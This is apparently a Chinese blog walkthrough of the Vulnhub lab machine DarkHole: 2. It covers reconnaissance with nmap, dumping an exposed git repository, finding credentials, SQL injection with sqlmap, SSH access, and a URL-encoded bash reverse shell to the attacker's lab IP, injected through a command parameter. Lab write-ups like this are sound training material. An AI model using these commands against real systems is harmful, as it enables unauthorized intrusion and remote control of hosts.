Vulnhub-DARKHOLE-2
title: 'Vulnhub-DARKHOLE: 2'
abbrlink: 334e7ff1
date: 2022-12-02 09:25:19
tags:
描述
- Name: DarkHole: 2
 - Date release: 3 Sep 2021
 - Author: Jehad Alqurashi
 - Series: DarkHole
 
Difficulty:Hard
This works better with VMware rather than VirtualBox
Hint: Don't waste your time For Brute-Force
nmap扫存活

kali 192.168.169.220
靶机  192.168.169.230 
nmap扫描靶机

端口 22 80
 Git repository  git泄露
目录


使用git工具
https://github.com/arthaud/git-dumper

- 运行 
git_dumper.py 
python3 git_dumper.py http://192.168.169.230/.git/ website

查看文件


一个登录页面 需要邮箱密码

git log

查看修改历史


发现账号密码
```
if($_POST['email'] == "[email protected]" && $_POST['password'] == "321"){
登陆测试


看url 有注入点
注入
- 要带上cookie
 

sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie  PHPSESSID=3ca3jbi4mk3749bv84uu4supol  --dbs


- ssh
 

- users
 

ssh
ssh [email protected]



find / -user root -perm -4000 -print 2>/dev/null
- 查看定时任务
 
cat  /etc/crontab

查看一下 /opt/web:
cat /opt/web/index.php

- 看下 tcp 进程:
 
netstat -tlnp


可以运行cmd
写入shell
- 开启监听
 - 进行url编码
 
bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
```
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
- 写入
 
curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"


- 查看历史命令
 


切换用户


提权



            本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 putdown.top